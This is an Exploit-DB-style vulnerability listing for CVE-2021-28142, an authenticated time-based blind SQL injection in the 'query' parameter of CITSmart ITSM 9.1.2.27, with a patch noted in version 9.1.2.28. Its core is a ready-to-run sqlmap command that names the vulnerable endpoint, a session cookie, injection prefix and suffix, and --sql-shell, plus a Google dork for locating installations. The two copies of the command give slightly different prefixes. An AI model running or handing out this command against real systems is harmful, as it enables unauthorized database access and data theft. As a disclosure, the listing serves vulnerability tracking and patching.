CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)

vendor:

CITSmart ITSM

by:

skysbsb

8.8

CVSS

HIGH

Time-based Blind SQL Injection

CWE

Product Name: CITSmart ITSM

Affected Version From: < 9.1.2.28

Affected Version To: < 9.1.2.28

Patch Exists: YES

Related CWE: CVE-2021-28142

CPE: a:citsmart:citsmart_itsm:9.1.2.27

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2021

CITSmart ITSM 9.1.2.27 – ‘query’ Time-based Blind SQL Injection (Authenticated)

To exploit this flaw it is necessary to be authenticated. The vulnerable URL is https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale and the vulnerable parameter is 'query'. Sqlmap usage is sqlmap -u "https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix ")" --suffix "AND ('abc%'='abc" --sql-shell

Mitigation:

Upgrade to version 9.1.2.28 or later

Source

Exploit-DB raw data:

# Exploit Title: CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)
# Google Dork: "citsmart.local"
# Date: 11/03/2021
# Exploit Author: skysbsb
# Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html
# Version: < 9.1.2.28
# CVE : CVE-2021-28142

To exploit this flaw it is necessary to be authenticated.

URL vulnerable:
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale
Param vulnerable: query

Sqlmap usage:  sqlmap -u "
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell

Affected versions: < 9.1.2.28
Fixed versions: >= 9.1.2.28

Vendor has acknowledge this vulnerability at ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)